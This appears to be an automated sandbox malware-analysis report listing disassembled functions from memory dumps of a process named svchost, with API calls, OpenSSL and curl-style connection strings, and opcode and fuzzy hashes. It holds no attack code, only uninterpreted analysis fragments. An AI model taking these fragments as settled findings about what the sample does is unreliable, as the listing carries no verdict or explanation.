                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                                                                • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                                                                • API String ID: 740688525-1880043860
                                                                                                                                                                                • Opcode ID: a884228641839191be65c3ac2ac7a3c326e3e6141d42a893dd69659de6aa1d03
                                                                                                                                                                                • Instruction ID: c5338fe45ac1907fd203d87104ec588ab430fa121b4f9da856d08571188d5cb1
                                                                                                                                                                                • Opcode Fuzzy Hash: a884228641839191be65c3ac2ac7a3c326e3e6141d42a893dd69659de6aa1d03
                                                                                                                                                                                • Instruction Fuzzy Hash: CB517C21B0B64665EA659F76A8106BD6290EF48BF0F480B34DE3D4B3D4DF3CE645E204
                                                                                                                                                                                APIs
                                                                                                                                                                                • ERR_new.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FF8A9348692), ref: 00007FF8A93487D5
                                                                                                                                                                                • ERR_set_debug.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FF8A9348692), ref: 00007FF8A93487ED
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: R_newR_set_debug
                                                                                                                                                                                • String ID: ssl\statem\statem.c$write_state_machine
                                                                                                                                                                                • API String ID: 193678381-3145639028
                                                                                                                                                                                • Opcode ID: 375df58a6fe72e2a8ebb13675cc0dc8b7a808cb7e5c548a03534db37eaa960cd
                                                                                                                                                                                • Instruction ID: 4226c926abf676242821a131b05bf652e68bf11ba3c6f9bf4fef143b2f17e5ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 375df58a6fe72e2a8ebb13675cc0dc8b7a808cb7e5c548a03534db37eaa960cd
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FA1AC22A0EAC2A5EB60DF25D4503B923B0FB85BC9F496032CA1DCB695DEBCE545C711
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: R_newR_set_debug$O_writeR_vset_error
                                                                                                                                                                                • String ID: ssl3_finish_mac$ssl\s3_enc.c
                                                                                                                                                                                • API String ID: 4154431231-3730779252
                                                                                                                                                                                • Opcode ID: d47c5098d58e01f3ea8272b0cf0ab98142f293724266686d08e1ff59bfbdd8bb
                                                                                                                                                                                • Instruction ID: b6f7eadc8a517f9bb3af882c9cd979626770d09ed1d9073d6cdfe78434e3579e
                                                                                                                                                                                • Opcode Fuzzy Hash: d47c5098d58e01f3ea8272b0cf0ab98142f293724266686d08e1ff59bfbdd8bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 4921B431F1D9C275FBA09F11E9526FA1260DF887C0F442532EA2DC36D6DD6CD6848700
                                                                                                                                                                                APIs
                                                                                                                                                                                • ERR_new.LIBCRYPTO-3-X64(?,00007FF8A932612C,?,00007FF8A930F4D2,?,00007FF8A9310F40), ref: 00007FF8A92E699C
                                                                                                                                                                                • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FF8A932612C,?,00007FF8A930F4D2,?,00007FF8A9310F40), ref: 00007FF8A92E69B4
                                                                                                                                                                                • ERR_set_error.LIBCRYPTO-3-X64(?,00007FF8A932612C,?,00007FF8A930F4D2,?,00007FF8A9310F40), ref: 00007FF8A92E69C4
                                                                                                                                                                                • ASYNC_get_current_job.LIBCRYPTO-3-X64 ref: 00007FF8A92E6A1B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a92d0000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                • String ID: SSL_do_handshake$expect_quic$ssl\quic\quic_impl.c$ssl\ssl_lib.c
                                                                                                                                                                                • API String ID: 2134390360-1983154402
                                                                                                                                                                                • Opcode ID: 65262653f3e098f495c12320a0e5f1a27c419ec530ea063dc5ceeadd3c499906
                                                                                                                                                                                • Instruction ID: 47d488283994e1325208cd59d2f3fb544275f90d3d812711a50778e3128a4830
                                                                                                                                                                                • Opcode Fuzzy Hash: 65262653f3e098f495c12320a0e5f1a27c419ec530ea063dc5ceeadd3c499906
                                                                                                                                                                                • Instruction Fuzzy Hash: D7617F32E0EB81A2EB109F29E45026E7761FB88BC4F141235EA9D87799EF3CE550C740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$connect
                                                                                                                                                                                • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                                                                                                                                • API String ID: 375857812-3816509080
                                                                                                                                                                                • Opcode ID: afaed4749460bb93f0f15da39a3a7704ab2afc0e4dcc77a7125d0fe2b1df14b7
                                                                                                                                                                                • Instruction ID: 2b272b6d71b57fafbe2fd6d282ccd7a03bc8dfd13f2aa82f4f93f9127f09d541
                                                                                                                                                                                • Opcode Fuzzy Hash: afaed4749460bb93f0f15da39a3a7704ab2afc0e4dcc77a7125d0fe2b1df14b7
                                                                                                                                                                                • Instruction Fuzzy Hash: FD61AE72A0C68685EB509B2DD8107B97750AB49BE8F084231DF2D0B7D6DF6CE486C748
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalErrorLastSection$Leavefreememmove$Enterfreeaddrinfogetaddrinfomallocsend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3198214216-0
                                                                                                                                                                                • Opcode ID: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                                                                                                                                • Instruction ID: fc6559df27bb60f95e2f9acec8f88aa35860fa458591142b5c8561b735004956
                                                                                                                                                                                • Opcode Fuzzy Hash: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                                                                                                                                • Instruction Fuzzy Hash: DD316132A08643C6EB508F6DE49026A77A4FB88BD9F484131DB5D476A4CF3CD48ACB44
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: cae88da3f2ce80adeffe639b4e2b8a32ea9b8699c597949c163ecbc637684577
                                                                                                                                                                                • Instruction ID: 7439e03390449cbcb4487f20247e7f09352d83a1ec714f0ab7ae8b5d0c0caba9
                                                                                                                                                                                • Opcode Fuzzy Hash: cae88da3f2ce80adeffe639b4e2b8a32ea9b8699c597949c163ecbc637684577
                                                                                                                                                                                • Instruction Fuzzy Hash: 8DC1132290E686A9EB60AF74E8602BD3BA0EBC0BC4F444135DB4D07391DF7DEA55E301
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memmove$ErrorLastfreefreeaddrinfogetaddrinfomalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 420754818-0
                                                                                                                                                                                • Opcode ID: 5334387e70918931a8086a059add0a455f26d0fd9a44f8aa36c02cfba4fcbe3f
                                                                                                                                                                                • Instruction ID: 89aec715e9b8487d048d5e1ead27dc1d118614fc0256b194282b153347008ffc
                                                                                                                                                                                • Opcode Fuzzy Hash: 5334387e70918931a8086a059add0a455f26d0fd9a44f8aa36c02cfba4fcbe3f
                                                                                                                                                                                • Instruction Fuzzy Hash: E7413D37A0974586EA658F1AE540A2EBBA5FB4CBE4F084139DF9D43B94DF3CE4428704
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                                                                                                                                                                                • API String ID: 0-551583306
                                                                                                                                                                                • Opcode ID: 220e206646726e4974bcb28fc23bdaef544751ee620ec29b44f371a4f5d78497
                                                                                                                                                                                • Instruction ID: 571d7224690fff8aa57be3e0e24b913ee9edff9eef2193ce3b560dff003e40e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 220e206646726e4974bcb28fc23bdaef544751ee620ec29b44f371a4f5d78497
                                                                                                                                                                                • Instruction Fuzzy Hash: C7A178A2A0D78686FB659B2ED844379ABA0AB59BC4F0C4031CF4D47395DF2CE847C748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FormatMessagestrchrwcstombs
                                                                                                                                                                                • String ID: Unknown error
                                                                                                                                                                                • API String ID: 4171340688-83687255
                                                                                                                                                                                • Opcode ID: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                                                                                                                                • Instruction ID: 9c8dfd2a6b4d26f0fc3d96767eff2baae9773b66dae781122eecc7263dd9bb22
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E219221A0CBC186EB758B29AC1436E7694AF8D7D4F4C5230CB9D037E5DF7D94468718
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FF8A7FC2B09,?,00007FF8A7F921C5,?), ref: 00007FF8A7FB5516
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConsoleMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4145635619-0
                                                                                                                                                                                • Opcode ID: 3cf9789a2cc96641790c847b937c231d709604a1eb0cd5209e808313b764b261
                                                                                                                                                                                • Instruction ID: 376bc4b792725b9623360f5c14ea5ef9eb0aecb49cc14c5e3e4e2d623daf3d29
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cf9789a2cc96641790c847b937c231d709604a1eb0cd5209e808313b764b261
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B91EF62A1A652ADFB50DF7594806BD2BA1FB88BC8F140136DF0E57A85DE3CE645E300
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$realloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3347955621-0
                                                                                                                                                                                • Opcode ID: 1ab9d8d0f17bbd1ebaf4425baa68e73a11b8ebfcdcec207939a5d84b0c1f6593
                                                                                                                                                                                • Instruction ID: 01910ea45c90eb86b19fae7a152d0461642652cb17cf0982fb45a195b811905a
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ab9d8d0f17bbd1ebaf4425baa68e73a11b8ebfcdcec207939a5d84b0c1f6593
                                                                                                                                                                                • Instruction Fuzzy Hash: 19317C3670AB45C5EB508F29E64462977A5EB4CFC8F088431DB8D87B58DF3CD8528344
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                                                                                                                                                                • API String ID: 0-3791222319
                                                                                                                                                                                • Opcode ID: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                                                                                                                                • Instruction ID: 1ad07ed504447381eec2ae1b86199d6ef11f4bd4f50cf0a6ed48fa5227a9cdcf
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E417521A0C74286FA60DA2E550027E7791AF59BE4F180231DF6E477D5EF3DE44BAB08
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastSleepgetsockopt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3033474312-0
                                                                                                                                                                                • Opcode ID: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                                                                                                                                • Instruction ID: 295b7cf55e2b0b3489b97fbfdec173d5ce2bdea50a941a3636ab4f5914823a24
                                                                                                                                                                                • Opcode Fuzzy Hash: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D012C35A0C64387EB608F19E45463AB7A0EB4D7C4F7C4034EB8986AA4DF3DD44A8B08
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseEventfree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 126896923-0
                                                                                                                                                                                • Opcode ID: 23ff2c79f5162c5d07257b2261cc769f3110da471bd25ac2b3359673cd49109f
                                                                                                                                                                                • Instruction ID: 4bfb4978da51fc1af1d3348741306b956e316d8fe9e4fe9718eb46c6565e0825
                                                                                                                                                                                • Opcode Fuzzy Hash: 23ff2c79f5162c5d07257b2261cc769f3110da471bd25ac2b3359673cd49109f
                                                                                                                                                                                • Instruction Fuzzy Hash: 93515C62A1D68281EE51EB29E4502BD62A4AF8DBD4F4D0435DF4E0779AEF3CE443C718
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270001047.00007FF8A92D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269982680.00007FF8A92D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270075892.00007FF8A938D000.00000004.00000001.01000000.0000000F.sdmpDownload File
